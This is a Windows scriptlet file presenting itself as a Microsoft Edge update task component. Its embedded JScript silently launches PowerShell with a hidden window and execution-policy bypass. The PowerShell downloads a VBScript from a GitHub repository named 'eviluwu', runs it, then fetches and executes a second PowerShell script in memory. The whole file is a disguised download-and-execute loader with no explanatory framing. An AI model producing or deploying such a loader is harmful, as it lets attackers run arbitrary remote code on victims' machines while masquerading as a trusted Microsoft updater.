<?xml version="1.0"?>
<scriptlet>
<registration progid="MicrosoftEdgeUpdateUpdaterTaskMachineCore" classid="{5C659079-6969-6767-88EF-726481711200}">
<script language="JScript">
<![CDATA[
    var shell = new ActiveXObject("WScript.Shell");
    shell.Run("powershell.exe -W Hidden -EP Bypass -Command \"$p=$env:TEMP+'\\HP.vbs'; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/b3at1/eviluwu/refs/heads/main/HP.vbs' -OutFile $p; wscript.exe //E:vbscript $p; IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/b3at1/eviluwu/refs/heads/main/uwu.ps1')\"", 0);
]]>
</script>
</registration>
</scriptlet>